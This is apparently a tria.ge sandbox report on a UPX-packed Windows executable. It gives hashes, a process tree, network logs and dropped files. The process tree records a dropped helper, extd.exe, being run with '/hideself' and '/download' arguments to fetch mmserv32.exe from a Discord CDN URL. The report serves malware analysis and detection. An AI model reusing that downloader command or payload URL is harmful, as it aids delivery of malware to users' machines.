Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

3

a1e0aa315c...ea.exe

windows7-x64

7

a1e0aa315c...ea.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/02/2024, 12:34 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a1e0aa315c2caf13f0f7edacea3e9aea.exe

  • Size

    450KB

  • MD5

    a1e0aa315c2caf13f0f7edacea3e9aea

  • SHA1

    3e768bdf99b6e40d8da1a0a74f345c8a316a6b89

  • SHA256

    ca1c052698c5a5c7e5ddcd14a95709288a364cd0be7fa06d03c62c2ead4ea78b

  • SHA512

    40aa04ce71823a9fa163c970263967cba1bec99fff08ff1abb0d5ba0a7b450e9733e9910a63023ca12e26b9d38399b1750676dda70a934e97ecc0f4093c708d0

  • SSDEEP

    12288:0tzE5elwLz9Tr/G89suLMBU2R6rPfgi5QGRTYseAC+kYr8:0tA4KdTDG/hRaAiZRTyRpYA

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 4 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a1e0aa315c2caf13f0f7edacea3e9aea.exe
    "C:\Users\Admin\AppData\Local\Temp\a1e0aa315c2caf13f0f7edacea3e9aea.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4940
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\573A.bat C:\Users\Admin\AppData\Local\Temp\a1e0aa315c2caf13f0f7edacea3e9aea.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1080
      • C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:4704
      • C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:4436
      • C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe" "mmserv32.exe" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:4192
      • C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:2308

Network

  • flag-us
    DNS
    cdn.discordapp.com
    extd.exe
    Remote address:
    8.8.8.8:53
    Request
    cdn.discordapp.com
    IN A
    Response
    cdn.discordapp.com
    IN A
    162.159.129.233
    cdn.discordapp.com
    IN A
    162.159.135.233
    cdn.discordapp.com
    IN A
    162.159.133.233
    cdn.discordapp.com
    IN A
    162.159.134.233
    cdn.discordapp.com
    IN A
    162.159.130.233
  • flag-us
    GET
    https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe
    extd.exe
    Remote address:
    162.159.129.233:443
    Request
    GET /attachments/878569652987502634/878573089506607124/mmserv32.exe HTTP/1.1
    Host: cdn.discordapp.com
    Accept: */*
    Response
    HTTP/1.1 403 Forbidden
    Date: Sat, 24 Feb 2024 12:35:08 GMT
    Content-Type: text/plain;charset=UTF-8
    Content-Length: 36
    Connection: keep-alive
    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
    Set-Cookie: __cf_bm=FpFWf8aPhW3t6HmR7j9rgDQ4CAVcRILXR7dUhFUkP4Y-1708778108-1.0-AXMWXLVdS4wwkIM+Fhq5LAQG0j9XlB0evYnpHC3kpQZa2bbdS3TH6lzlLxMBiu+5h8X1z0cdj2kg+AaZAFEu/38=; path=/; expires=Sat, 24-Feb-24 13:05:08 GMT; domain=.discordapp.com; HttpOnly; Secure
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Yk7iu%2FJ2JMeoMzxywB9vtoAbed0n9GgKA8Hhh%2BpXUgi0XtoTRVB0kRqFw2bQdFw6IKVPUPit6bXUXsIXetITihvmfDR4ZwfLAUGU4JLWuz5QJD4EOaAl1lYcifpt5Y%2FMrCluQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Set-Cookie: _cfuvid=0YxYgp88QKoqvA4nIuiGV_yBlob8QBkl4pXz3CvkHDw-1708778108077-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 85a7bf276c4adc57-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    71.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    71.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    9.228.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    9.228.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.a-0001.a-msedge.net
    g-bing-com.a-0001.a-msedge.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=
    Remote address:
    204.79.197.200:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=072FBD863D4A61042F65A9A93CAA60F8; domain=.bing.com; expires=Thu, 20-Mar-2025 12:35:08 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 563EFC8741F14F619C26DCF8D62AE13B Ref B: LON04EDGE1013 Ref C: 2024-02-24T12:35:08Z
    date: Sat, 24 Feb 2024 12:35:08 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=
    Remote address:
    204.79.197.200:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=072FBD863D4A61042F65A9A93CAA60F8
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=pkv_0A10dR_1ry8EbrEzB2RY5aChSj5uanctW9CD4gE; domain=.bing.com; expires=Thu, 20-Mar-2025 12:35:08 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 996F1F60DE254F5B9E9FA949DF8D66AB Ref B: LON04EDGE1013 Ref C: 2024-02-24T12:35:08Z
    date: Sat, 24 Feb 2024 12:35:08 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=
    Remote address:
    204.79.197.200:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=072FBD863D4A61042F65A9A93CAA60F8; MSPTC=pkv_0A10dR_1ry8EbrEzB2RY5aChSj5uanctW9CD4gE
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 694C17653991457C83F9EE97DC1E1955 Ref B: LON04EDGE1013 Ref C: 2024-02-24T12:35:08Z
    date: Sat, 24 Feb 2024 12:35:08 GMT
  • flag-us
    DNS
    233.129.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    233.129.159.162.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001a-msedgenet
  • flag-us
    DNS
    173.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    173.178.17.96.in-addr.arpa
    IN PTR
    Response
    173.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-173deploystaticakamaitechnologiescom
  • flag-us
    DNS
    41.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    41.110.16.96.in-addr.arpa
    IN PTR
    Response
    41.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-41deploystaticakamaitechnologiescom
  • flag-us
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.135.221.88.in-addr.arpa
    IN PTR
    Response
    217.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-217deploystaticakamaitechnologiescom
  • flag-us
    DNS
    209.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.178.17.96.in-addr.arpa
    IN PTR
    Response
    209.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-209deploystaticakamaitechnologiescom
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    25.73.42.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    25.73.42.20.in-addr.arpa
    IN PTR
    Response
  • 162.159.129.233:443
    https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe
    tls, http
    extd.exe
    903 B
     4.5kB
     10
    8

    HTTP Request

    GET https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe

    HTTP Response

    403
  • 204.79.197.200:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=
    tls, http2
    2.0kB
     9.2kB
     22
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e24878105afd488595afe0b626819913&localId=w:DE85FF22-0C12-E266-9673-0EBC171C1C82&deviceId=6825825694848287&anid=

    HTTP Response

    204
  • 8.8.8.8:53
    cdn.discordapp.com
    dns
    extd.exe
    64 B
     144 B
     1
    1

    DNS Request

    cdn.discordapp.com

    DNS Response

    162.159.129.233
    162.159.135.233
    162.159.133.233
    162.159.134.233
    162.159.130.233

  • 8.8.8.8:53
    71.159.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    71.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    9.228.82.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    9.228.82.20.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
     158 B
     1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    233.129.159.162.in-addr.arpa
    dns
    74 B
     136 B
     1
    1

    DNS Request

    233.129.159.162.in-addr.arpa

  • 8.8.8.8:53
    200.197.79.204.in-addr.arpa
    dns
    73 B
     106 B
     1
    1

    DNS Request

    200.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    173.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    173.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    41.110.16.96.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    41.110.16.96.in-addr.arpa

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    217.135.221.88.in-addr.arpa
    dns
    73 B
     139 B
     1
    1

    DNS Request

    217.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    209.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    209.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    25.73.42.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    25.73.42.20.in-addr.arpa

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\1773\mmserv32.exe
    Filesize

    36B

    MD5

    a1ca4bebcd03fafbe2b06a46a694e29a

    SHA1

    ffc88125007c23ff6711147a12f9bba9c3d197ed

    SHA256

    c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65

    SHA512

    6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\573A.bat
    Filesize

    942B

    MD5

    4cab807999cdd7910b9c43bdb8f7d211

    SHA1

    42438338c0330a539e92f6430c95c24d7cd8ab63

    SHA256

    ccbe8fa4538ad416b1b340d8dff530c12d46eb3041350b953456fb09a115de79

    SHA512

    355d8a31dc40fe01a093eaf390c59fe33bb1281a00d604b0341d02923241b1be16b771a98a6f5d069083efa4e9e801d7b652d1729015f8fd1de0e0f3f7b3f356

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
    Filesize

    326KB

    MD5

    c14ce13ab09b4829f67a879d735a10a1

    SHA1

    537e1ce843f07ce629699ef5742c42ee2f06e9b6

    SHA256

    ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

    SHA512

    c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

    Download Submit

  • memory/2308-22-0x0000000140000000-0x00000001400D8000-memory.dmp

    Filesize

    864KB

    Download

  • memory/4192-16-0x0000000140000000-0x00000001400D8000-memory.dmp

    Filesize

    864KB

    Download

  • memory/4436-9-0x0000000140000000-0x00000001400D8000-memory.dmp

    Filesize

    864KB

    Download

  • memory/4436-10-0x0000000140000000-0x00000001400D8000-memory.dmp

    Filesize

    864KB

    Download

  • memory/4704-6-0x0000000140000000-0x00000001400D8000-memory.dmp

    Filesize

    864KB

    Download

  • memory/4704-7-0x0000000140000000-0x00000001400D8000-memory.dmp

    Filesize

    864KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.